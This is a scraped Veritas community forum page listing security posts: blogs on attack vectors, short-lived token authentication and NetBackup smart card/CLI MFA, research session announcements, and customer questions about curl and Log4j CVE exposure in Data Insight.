Securing Data and Infrastructure: A Comprehensive Approach
Security of data and infrastructure has become a world in itself. Everyone talks about so many terms that it’s easy to feel overwhelmed by the possibilities of securing your data. At the same time, you may wonder what you need in your environment and whether it is going to be enough. I hear so many terms get thrown around like anomaly detection, multifactor authentication, malware scanning, zero trust access, etc. But what am I really protecting, and am I covering all my bases to make sure that my data and infrastructure are protected? How can I tell with confidence that I have a good security strategy? One good way I have found to answer that question is to narrow down my focus and compartmentalize the areas that I need to solve for. First and foremost, I need to figure out what my attack vectors are. Once I figure that out, I have a finite number of vectors that I can easily comprehend and think about securing. As a part of that exercise, I came up with my five attack vectors, which are: Users Network Application Storage or data Operating systems Physical hardware security could be the sixth one, but I am going to park that as something that is likely already covered, maybe because you have your infrastructure within a secure data center and in a locked cage with cameras around. Diagram 1: Attack vectors and security needs Once I have determined my attack vectors, I can now focus on securing those five areas against any type of attacks. I must also consider multiple ways to protect any single vector in case any of the mechanisms get breached or compromised. For example, I can have an industry-standard authentication mechanism but also use multifactor authentication in case my credentials are compromised. I can also use quorum approval or multiperson authorization for any critical operations in case someone gets access to the system. Similarly, on the data front, I need immutability, which prevents data from being modified. I also need indelibility with my operating system to make sure that data cannot be deleted. You can go as deep into any attack vector as needed, depending on what your requirements are for making that vector secure. I found this framework very useful in defining my requirements to secure the data and the infrastructure in a data center. Diagram 2: Responsibility model for Security Once you have identified the different attack vectors and needs across those vectors, your next task is to figure out how to get these requirements met in your environment. For example, you might have to go with external vendors for password and access management, for authentication, or for malware scanning and anomaly detection. Unfortunately, not everything is available with third-party integrations. Especially when you try to protect the fundamental operating system layer, you can’t do much by yourself. For example, the system that controls access to the data needs to be immutable in architecture and indelible by design. If someone gets root access to a system, they can easily go and destroy the data. So, you must implement these design principles on your own to get end-to-end protection and true immutability and indelibility. Concepts like zero trust access, removing root privileges, immutable architecture, managing containers, and network and application isolation are all needed to get that end-to-end protection. However, it’s complex and time consuming to do on your own. Another big lift is vulnerability management. Given that the infrastructure now gets hit by ransomware attacks every second, the attackers look to expose every vulnerability on any system. Managing these vulnerabilities and getting their fixes can be a tall order. It’s no secret that securing your environment is a team effort that requires a group of security experts who can provide ongoing and continuous protection against a 24-7 team of hackers. That is where Veritas NetBackup Flex appliances are your natural partners, providing the end-to-end security in your environment. With Flex Appliance, you get the zero trust-based immutable architecture out of the box, plus continuous management of vulnerabilities that you wouldn’t otherwise get by just putting a data protection software on your own systems. Read more on NetBackup Flex Appliance here.8.1KViews0likes0Comments(CEP-19129) Security Administration Dashboard
Interaction Date:June 18 - June 28, 2024 Interaction Type:Q&A Interview / Interactive Research Session The Veritas Research Team is conducting an interactive research session about the security administration dashboard. This two part session will focus on understanding your definition and triage of theats, and the second part will focus on walkthrough of some security dashboard the design team is creating to get your feedback. If you are interested in getting more details about this opportunity or in participating in other exciting interactions and are not currently a member of our CPEP program, you can register here:https://cpep.veritas.comthencontact us atcustomer.engagement@veritas.com.130Views0likes0CommentsWhen it comes to SECRETS, how secure is yourapplication?
Introduction Enterprises running various heterogeneous workloads ranging from on prem applications to applications spread across various cloud service providers, oftenstruggle to manage credentials securely. We’ve seen a lot of technical debates about how to find a perfect balance between security and flexibility, but there’s no de facto standard hack which fits in for all. We’ve seen (sometimes radically) different opinions on “the right way” to manage secrets: “You should always use vault”, “You should encrypt creds” and the list is never ending! To cope up with these challenges, Veritas introduces Alta Recovery Vault short lived token-based authentication. For us, your data’s security is paramount to us. Prior to short lived tokens, Veritas provided ability to connect to Alta Recovery Vault with Standard Credentials (access and secret keys) as shown below : Diagram1: Creating a Credential with the Storage Account and Traditional Credentials (Access key and secret) given by Veritas Disadvantages of using Standard Credentials in Recovery Vault These standard credentials are long lived in nature. If compromised, they give attackers ample time to exploit the application. If they are stolen it would be a nightmare to discern which operations are legitimate. Thus, the only fail-safe choice is to cumbersomely rotate the keys and redistribute to customers. This is often overlooked action and adds extra pain for the DevOps.( p.s: It's not happier as it seems to be in the adajcent picture) Solution To help alleviate some of the above risks, Veritas has leveraged the ability to enhance security by introducingshort lived token-based authentication. Beginning with NetBackup 10.2 for Azure and NetBackup 10.4 for AWS (...GCP work in progress), users will have cloud storage accounts and a short-lived refresh token to connect securely to the Alta Recovery Vault storage. These new secrets are added as Credentials in the NetBackup Credential Management (as shown in diagram 2a and 2b) Once the initial connection is established, Veritas credential Management API is solely responsible forrenewing, refreshing, accessing and sharing access signature.Isn’t it amazing just no pain to rotate the keys and redistribute! ( I see the cyber security team seems happier and overjoyed ) Diagram 2a: Creating a Credential with the Storage Account and Refresh Token given by Veritas for Azure Diagram 2b: Creating a Credential with the Refresh Token given by Veritas for AWS Solution Benefits Enhanced Security :Short-lived tokens have a limited lifespan, reducing the exposure window for potential attacks. If a token is compromised, its validity period is short, minimizing the risk of unauthorized access. Regular token expiration forces users to re-authenticate, ensuring better security. Mitigating Token Abuse :Tokens are often used to authorize access to resources. By making tokens short lived, we limit the time an attacker can use to abuse a stolen token. Thus, minimizing the risk window significantly. Better Management of Permissions :When permissions change (e.g., user roles or access levels), short-lived tokens automatically reflect the updates upon renewal. Long-lived tokens may retain outdated permissions, leading to security risks. Conclusion Introduction to Alta Recovery Vault short lived token authentication adds another layer for ransomware protection thus making applications more secure than ever before. At Veritas, your data’s security is paramount to us and this blog serves just as one simple example of the challenges Veritas short lived tokens can help solve. Further, Veritas is always looking and working for better ways to secure your data. Here are some additional helpful links : Veritas Alta Recovery Vault Technical White Paper Veritas Alta Recovery Vault Security Guide Veritas Alta Recovery Vault Azure ExpressRoute Overview Guide Veritas Alta™ Recovery Vault AWS Direct Connect Overview Guide Please feel freeto give feedback and we can answer any queries !! Appreciate everyone time :)595Views3likes0CommentsCVE-2023-38545/6 security vulnerability.
In trying to assess implications of the CURL hack upon Data Insight I see the\DataInsight\perl\site\lib\HTTP\Any\Curl.pm perl module listslibcurl 7.21.6 or newer. While that is a very old version and specifically the CVEs call out Affected Versions Affected versions: libcurl 7.69.0 to and including 8.3.0 Not affected versions: libcurl < 7.69.0 and >= 8.4.0 (where a patch has been identified) we are left to wonder as to ramifications of system software changes upon the Application. Our organization will be patching for the various applications utilizing http calls over Socks5 (mentioned as a proxy in the script) and I will need to know a few facts to enter discussions with our security team. Is DI affected by the vulnerability? Will DI be aversely affected by patching to the latest library version? Has Veritas released any statement on the vulnerability and its products? Thank you PixSolved1.3KViews0likes2Comments(CEP-18692) Security Vendor Survey
Interaction Date: June 21 - June 30, 2023 Interaction Type: Online Survey Our Cyber Security PM team is interested to get your feedback about Security Vendors that are in use in your environment (On prem and cloud) If you are interested in participating other exciting interactions, and are not currently a member of our CPEP program, you can register here:https://cpep.veritas.comthencontact us atcustomer.engagement@veritas.com.396Views0likes0CommentsNeutralize threat of cyber-attacks with NetBackup Flex Appliances
89% of all organizations have fallen victim to a successful ransomware attack resulting in unrecoverable data events. See how to significantly reduce the risk of a cyber--attack and recover confidently with an air-gapped turn-key appliance.5.2KViews1like0CommentsNetBackup 10 – Authentication Enhancements with Smart Cards and RBAC
You and your organization have a growing need to ensure authentication methods are robust and resilient. You need to prove you are who you say you are while meeting strict compliance guidelines. Smart-Card authentication For many organizations, Smart Cards provide an excellent method to adopt zero trust security models and, in some cases, comply with federal regulations {link}. This can be a challenge when the Smart Card is not part of the same authentication mechanism as NetBackup. This enhancement provides an option to support the smart card without using a directory service, such AD or LDAP. NetBackup has adapted our smart card authentication in an environment to be more flexible without associating a directory service. The user will be added simply using the Common Name (CN) or Universal Principal Name (UPN) of the certificate for user mapping instead of a complex directory service configuration for the Smart Card. After you toggle on the Smart card authentication, you’ll see the options to proceed without a domain, and which certificate mapping attribute to use. (See picture 1 below) Multi-Factor Authentication for CLI users Your Role-Based Access Control (RBAC) users are granted rights within the WebUI to perform their related workload tasks. There are situations where those RBAC users may need to work on the command line outside of the NetBackup WebUI. There is now a mechanism to allow those users to access the Command Line Interface (CLI). Conversely, you can ensure that this new role is only delegated to those users with the need. Below is the use-case: User already has an RBAC role and has logged into the NetBackup WebUI previously User needs CLI access for short periods (less than 24 hours) In the WebUI, the user must be part of the new NetBackup Command Line (CLI) Administrator Role, in addition to their desired workload RBAC role. This role will allow all commands to be executed by the user, so zero-trust procedures should be taken to grant this role only to users with permissible purpose. From the CLI, a user initiates the login process with the following command, with special attention to the “loginType”: # /usr/openv/netbackup/bin/bpnbat -login -loginType WebUI {CLI screenshot of 2FA workflow, including WebUI popup} Approvals for the CLI login will come to the user’s WebUI session as a 6 digit code. Since the user already had to authenticate in the configured way, this is highly trusted. This allows the bpnbat command to proceed. This allows CLI privileges for the next 24 hours to your user. Therefore, Smart cards are now easier to consume in NetBackup by removing previous directory service requirements, allowing ease-of-use balanced with security. Multi-Factor Authentication for the CLI paired with the new RBAC role offers more control of your users.1.1KViews3likes0CommentsApache Tomcat JNDI features used in DI <Pri:1>
With the release of a POC for theApache Log4j2 CV can we confirm Data Insight is or is not affected? NIST-https://nvd.nist.gov/vuln/detail/CVE-2021-44228 Mitre -https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228,== What effect will setting 'MsgNoLookups' or disabling 'trustURLCodebase' have on DI's operations and logging? ref:https://www.oracle.com/java/technologies/javase/8u121-relnotes.html Thank you PixSolved2.3KViews0likes5Comments